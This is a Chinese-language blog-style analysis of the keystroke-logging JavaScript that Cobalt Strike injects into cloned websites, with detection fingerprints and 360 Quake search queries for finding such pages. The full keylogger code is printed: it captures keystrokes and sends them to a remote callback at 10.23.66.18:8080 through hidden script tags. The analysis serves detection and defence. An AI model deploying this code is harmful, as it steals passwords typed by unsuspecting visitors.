分析过程
cs克隆克隆后的html和原html对比
特征:
- IFRAME标签为大写,且长宽为0。
- script标签加载了js路径为”/jquery/jquery.min.js”
顺序特征:
- IFRAME标签和script标签同时出现时,一定是IFRAME标签、script标签和body标签这个顺序。
- IFRAME标签和script标签只出现一个时,一定在body标签之前。
引用的js分析:
<span>var</span> cfqPdaQzXzSSf = <span>0</span>;<br><span>window</span>.onload = <span><span>function</span> <span>loadfqPdaQzXzSSf</span>(<span></span>) </span>{ <span>//页面加载处理事件</span><br> lfqPdaQzXzSSf = <span>","</span>;<br> <span>if</span> (<span>window</span>.addEventListener) { <span>//对象触发指定的事件</span><br> <span>document</span>.addEventListener(<span>'keypress'</span>, pfqPdaQzXzSSf, <span>true</span>); <span>//keypress所有键都会触发该事件,无论它们是否产生字符值 处理函数
fqPdaQzXzSSf</span><br> <span>document</span>.addEventListener(<span>'keydown'</span>, dfqPdaQzXzSSf, <span>true</span>); <span>//keydown当按下某个键时会触发该事件 处理函数:dfqPdaQzXzSSf</span><br> } <span>else</span> <span>if</span> (<span>window</span>.attachEvent) { <span>//attachEvent在IE9以下的版本中受到支持。其它的都支持addEventListener</span><br> <span>document</span>.attachEvent(<span>'onkeypress'</span>, pfqPdaQzXzSSf);<br> <span>document</span>.attachEvent(<span>'onkeydown'</span>, dfqPdaQzXzSSf);<br> } <span>else</span> { <span>//两者都不支持全部置空</span><br> <span>document</span>.onkeypress = pfqPdaQzXzSSf;<br> <span>document</span>.onkeydown = dfqPdaQzXzSSf;<br> }<br><br><br>}<br><br><br><span><span>function</span> <span>pfqPdaQzXzSSf</span>(<span>e</span>) </span>{<br> kfqPdaQzXzSSf = (<span>window</span>.event)?<span>window</span>.event.keyCode:e.which; <span>//只有当DOM事件处理程序被调用的时</span><br> kfqPdaQzXzSSf = kfqPdaQzXzSSf.toString(<span>16</span>); <span>//将键盘码转换为ascii</span><br> <span>if</span> (kfqPdaQzXzSSf != <span>"d"</span>) { <span>//随便写个判断进入函数</span><br> fqPdaQzXzSSf(kfqPdaQzXzSSf);<br> }<br><br><br>}<br><br><br><span><span>function</span> <span>dfqPdaQzXzSSf</span>(<span>e</span>) </span>{<br> kfqPdaQzXzSSf = (<span>window</span>.event)?<span>window</span>.event.keyCode:e.which;<br> <span>if</span> (kfqPdaQzXzSSf == <span>9</span>||kfqPdaQzXzSSf == <span>8</span>||kfqPdaQzXzSSf == <span>13</span>) { <span>//tab键,退格键,回车键</span><br> fqPdaQzXzSSf(kfqPdaQzXzSSf);<br> }<br><br><br>}<br><br><br><span><span>function</span> <span>fqPdaQzXzSSf</span>(<span>kfqPdaQzXzSSf</span>) </span>{<br> lfqPdaQzXzSSf = lfqPdaQzXzSSf + kfqPdaQzXzSSf + <span>","</span>; <span>//键盘值拼接</span><br> <span>var</span> tfqPdaQzXzSSf = <span>"ZUyQXfawhPbi"</span> + cfqPdaQzXzSSf;<br> cfqPdaQzXzSSf++;<br> <span>var</span> ffqPdaQzXzSSf;<br> <span>if</span> (<span>document</span>.all&&(navigator.appVersion.match(<span>/MSIE ([\d.]+)/</span>)[<span>1</span>]) <= <span>8.0</span>) { <span>//浏览器版本判断是否小于或等于8.0</span><br> ffqPdaQzXzSSf = <span>document</span>.createElement(<span>String</span>.fromCharCode(<span>60</span>) + <span>"script name='"</span>+tfqPdaQzXzSSf+<span>"' id='"</span>+tfqPdaQzXzSSf+<span>"'"</span> + <span>String</span>.fromCharCode(<span>62</span>) + <span>String</span>.fromCharCode(<span>60</span>) + <span>"/script"</span> + <span>String</span>.fromCharCode(<span>62</span>));<br> } <span>else</span> {<br> ffqPdaQzXzSSf = <span>document</span>.createElement(<span>"script"</span>);<br> ffqPdaQzXzSSf.setAttribute(<span>"id"</span>, tfqPdaQzXzSSf);<br> ffqPdaQzXzSSf.setAttribute(<span>"name"</span>, tfqPdaQzXzSSf);<br> }<br><br><br> <span>var</span> ejDBFWFHhff = <span>'?id='</span> + <span>window</span>.location.href.split(<span>/\?id=/</span>)[<span>1</span>]; <span>//取键盘ascii码</span><br> ffqPdaQzXzSSf.setAttribute(<span>"src"</span>, <span>"http://10.23.66.18:8080/callback"</span> + ejDBFWFHhff + <span>"&data="</span> + lfqPdaQzXzSSf);<br> ffqPdaQzXzSSf.style.visibility = <span>"hidden"</span>;<br> <span>document</span>.body.appendChild(ffqPdaQzXzSSf); <span>//实例化js,发送键盘码</span><br> <span>if</span> (kfqPdaQzXzSSf == <span>13</span>||lfqPdaQzXzSSf.length > <span>3000</span>) { <span>//判断键盘码为回车键置空lfqPdaQzXzSSf变量</span><br> lfqPdaQzXzSSf = <span>","</span>;<br> }<br><br><br> setTimeout(<span>'document.body.removeChild(document.getElementById("'</span> + tfqPdaQzXzSSf + <span>'"))'</span>, <span>5000</span>); <span>//延时5秒删除创建的js</span><br>}<br>页面加载处理事件,添加针对键盘按下的事件。触发事件的时候进入dfqPdaQzXzSSf和dfqPdaQzXzSSf函数处理,最后调用fqPdaQzXzSSf函数,将键盘码通过创建script标签将数据传送到远端。最后延迟5秒后删除创建的js
pfqPdaQzXzSSf函数:
键盘码转ascii码发送到fqPdaQzXzSSf函数
dfqPdaQzXzSSf函数:
如果按下tab键,退格键,回车键调用fqPdaQzXzSSf函数发送键盘
chrome动态调试
键盘码判断
键盘码拼接
js创建发送键盘码到远端
cs远端接收的密码
360空间绘测特征搜索:
response:<span>"<head> <base href="</span> <span>AND</span> response:<span>"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">"</span> <span>AND</span> response:<span>"jquery/jquery.min.js\"></script> </body>"</span><br><br>response:<span>"<head> <base href="</span> <span>AND</span> response:<span>"<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/favicon.ico\">"</span> <span>AND</span> response:<span>"WIDTH=\"0\" HEIGHT=\"0\"></IFRAME>"</span><br>
https://mp.weixin.qq.com/s/1lZlqxTuEcS3VK1Ve8XDbA
